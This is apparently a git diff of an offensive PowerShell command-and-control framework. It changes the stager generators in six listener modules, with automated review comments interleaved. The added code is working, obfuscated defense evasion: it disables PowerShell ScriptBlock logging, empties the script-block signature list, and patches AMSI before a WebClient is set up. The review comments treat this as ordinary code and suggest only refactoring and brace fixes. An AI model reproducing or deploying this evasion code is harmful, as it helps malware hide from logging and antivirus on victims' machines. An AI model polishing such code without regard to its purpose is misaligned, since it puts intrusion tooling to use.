diff --git a/lib/listeners/dbx.py b/lib/listeners/dbx.py
index 5bf5d73..99aabd9 100755
--- a/lib/listeners/dbx.py
+++ b/lib/listeners/dbx.py
@@ -175,15 +175,22 @@ class Listener:
 stager = ''
 if safeChecks.lower() == 'true':
+ stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
+
 # ScriptBlock Logging bypass
- stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
+ stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
 stager += "'System.Management.Automation.Utils'"
 stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
- stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
- stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
- stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
- stager += helpers.randomize_capitalization("$GroupPolicySettings")
- stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+ stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
+ stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
+ stager += "['ScriptB'+'lockLogging']"
+ stager += helpers.randomize_capitalization("){$GPS")
+ stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
+ stager += helpers.randomize_capitalization("$GPS")
+ stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
+ stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
+ stager += "'signatures','N'+'onPublic,Static'"
+ stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
 # @mattifestation's AMSI bypass
 stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
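Review bot: The same assembly of the safeChecks prefix — from the `If($PSVersionTable.PSVersion.Major -ge 3){` opener through the `HashSet[string]))}` line — is pasted verbatim into six listener modules in this commit (dbx.py here, then http.py, http_com.py, http_foreign.py, http_hop.py and http_mapi.py in the following hunks), so any later correction has to be made six times. Every copy already calls into `helpers`, so the block is a natural candidate for one function in that module returning the assembled string, with each listener reduced to a single `stager = helpers.<NEW_HELPER_NAME>()` call; the http_mapi copy has already drifted from the others in where its closing brace is appended, which is exactly the failure mode shared code prevents. The comment `# ScriptBlock Logging bypass` now sits below a version guard and above an `Else` branch it does not describe; a header comment such as `# safeChecks prefix: opens a PSVersion >= 3 guard that a later stager += "}" must close` would make the structure readable. The enclosing method begins and ends outside this hunk.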
@@ -191,6 +198,7 @@ class Listener:
 stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
 stager += "'amsiInitFailed','NonPublic,Static'"
 stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
+ stager += "}"
 stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
 stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
diff --git a/lib/listeners/http.py b/lib/listeners/http.py
index 3f45d37..3bae03a 100644
--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
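Review bot: The added `stager += "}"` closes the `If($PSVersionTable.PSVersion.Major -ge 3){` opened inside the `if safeChecks.lower() == 'true':` block in the previous hunk, so it has to be indented inside that same Python block; the collapsed hunk does not preserve indentation, so this cannot be confirmed here, but if the line sits one level out the listener emits an unmatched `}` whenever safeChecks is not 'true'. The same line is added in http.py, http_com.py, http_foreign.py and http_hop.py in the later hunks and the same check applies to each. A trailing comment, `stager += "}"  # closes the PSVersion guard opened at the top of the safeChecks block`, would tie the two halves together, since the opener and closer are separated by the whole AMSI section. The enclosing method begins before and ends after this hunk.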
@@ -192,15 +192,22 @@ class Listener:
 stager = ''
 if safeChecks.lower() == 'true':
+ stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
+
 # ScriptBlock Logging bypass
- stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
+ stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
 stager += "'System.Management.Automation.Utils'"
 stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
- stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
- stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
- stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
- stager += helpers.randomize_capitalization("$GroupPolicySettings")
- stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+ stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
+ stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
+ stager += "['ScriptB'+'lockLogging']"
+ stager += helpers.randomize_capitalization("){$GPS")
+ stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
+ stager += helpers.randomize_capitalization("$GPS")
+ stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
+ stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
+ stager += "'signatures','N'+'onPublic,Static'"
+ stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
 # @mattifestation's AMSI bypass
 stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
@@ -208,6 +215,7 @@ class Listener:
 stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
 stager += "'amsiInitFailed','NonPublic,Static'"
 stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
+ stager += "}"
 stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
 stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
diff --git a/lib/listeners/http_com.py b/lib/listeners/http_com.py
index af31ac8..819d62e 100644
--- a/lib/listeners/http_com.py
+++ b/lib/listeners/http_com.py
@@ -172,15 +172,22 @@ class Listener:
 stager = ''
 if safeChecks.lower() == 'true':
+ stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
+
 # ScriptBlock Logging bypass
- stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
+ stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
 stager += "'System.Management.Automation.Utils'"
 stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
- stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
- stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
- stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
- stager += helpers.randomize_capitalization("$GroupPolicySettings")
- stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+ stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
+ stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
+ stager += "['ScriptB'+'lockLogging']"
+ stager += helpers.randomize_capitalization("){$GPS")
+ stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
+ stager += helpers.randomize_capitalization("$GPS")
+ stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
+ stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
+ stager += "'signatures','N'+'onPublic,Static'"
+ stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
 # @mattifestation's AMSI bypass
 stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
@@ -188,6 +195,7 @@ class Listener:
 stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
 stager += "'amsiInitFailed','NonPublic,Static'"
 stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
+ stager += "}"
 stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
 # TODO: reimplement stager retries?
diff --git a/lib/listeners/http_foreign.py b/lib/listeners/http_foreign.py
index 557626e..0ab6a8b 100644
--- a/lib/listeners/http_foreign.py
+++ b/lib/listeners/http_foreign.py
@@ -147,15 +147,22 @@ class Listener:
 stager = ''
 if safeChecks.lower() == 'true':
+ stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
+
 # ScriptBlock Logging bypass
- stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
+ stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
 stager += "'System.Management.Automation.Utils'"
 stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
- stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
- stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
- stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
- stager += helpers.randomize_capitalization("$GroupPolicySettings")
- stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+ stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
+ stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
+ stager += "['ScriptB'+'lockLogging']"
+ stager += helpers.randomize_capitalization("){$GPS")
+ stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
+ stager += helpers.randomize_capitalization("$GPS")
+ stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
+ stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
+ stager += "'signatures','N'+'onPublic,Static'"
+ stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
 # @mattifestation's AMSI bypass
 stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
@@ -163,6 +170,7 @@ class Listener:
 stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
 stager += "'amsiInitFailed','NonPublic,Static'"
 stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
+ stager += "}"
 stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
 stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
diff --git a/lib/listeners/http_hop.py b/lib/listeners/http_hop.py
index c5a7757..092ee14 100644
--- a/lib/listeners/http_hop.py
+++ b/lib/listeners/http_hop.py
@@ -126,15 +126,22 @@ class Listener:
 stager = ''
 if safeChecks.lower() == 'true':
+ stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
+
 # ScriptBlock Logging bypass
- stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
+ stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
 stager += "'System.Management.Automation.Utils'"
 stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
- stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
- stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
- stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
- stager += helpers.randomize_capitalization("$GroupPolicySettings")
- stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+ stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
+ stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
+ stager += "['ScriptB'+'lockLogging']"
+ stager += helpers.randomize_capitalization("){$GPS")
+ stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
+ stager += helpers.randomize_capitalization("$GPS")
+ stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
+ stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
+ stager += "'signatures','N'+'onPublic,Static'"
+ stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
 # @mattifestation's AMSI bypass
 stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
@@ -142,6 +149,7 @@ class Listener:
 stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
 stager += "'amsiInitFailed','NonPublic,Static'"
 stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
+ stager += "}"
 stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
 stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
diff --git a/lib/listeners/http_mapi.py b/lib/listeners/http_mapi.py
index e53ac3b..5995b5c 100644
--- a/lib/listeners/http_mapi.py
+++ b/lib/listeners/http_mapi.py
@@ -175,15 +175,23 @@ class Listener:
 stager = ''
 if safeChecks.lower() == 'true':
+ stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
+
 # ScriptBlock Logging bypass
- stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
+ stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
 stager += "'System.Management.Automation.Utils'"
 stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
- stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
- stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
- stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
- stager += helpers.randomize_capitalization("$GroupPolicySettings")
- stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+ stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
+ stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
+ stager += "['ScriptB'+'lockLogging']"
+ stager += helpers.randomize_capitalization("){$GPS")
+ stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
+ stager += helpers.randomize_capitalization("$GPS")
+ stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
+ stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
+ stager += "'signatures','N'+'onPublic,Static'"
+ stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
+ stager += "}"
 # @mattifestation's AMSI bypass
 stager += helpers.randomize_capitalization('Add-Type -assembly "Microsoft.Office.Interop.Outlook";')
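Review bot: In this listener the closing `stager += "}"` is appended immediately after the `HashSet[string]))}` line, before the `# @mattifestation's AMSI bypass` comment, whereas in the other five listeners changed by this commit the brace follows the AMSI section; the two placements produce differently structured stagers and only one of them can be intended. Whichever is correct should be applied uniformly, which is a further reason to build this prefix in one shared helper rather than six copies. A comment on the brace line, `# closes the PSVersion guard opened at the top of the safeChecks block`, would make the intended scope explicit wherever it ends up. The enclosing method begins and ends outside this hunk.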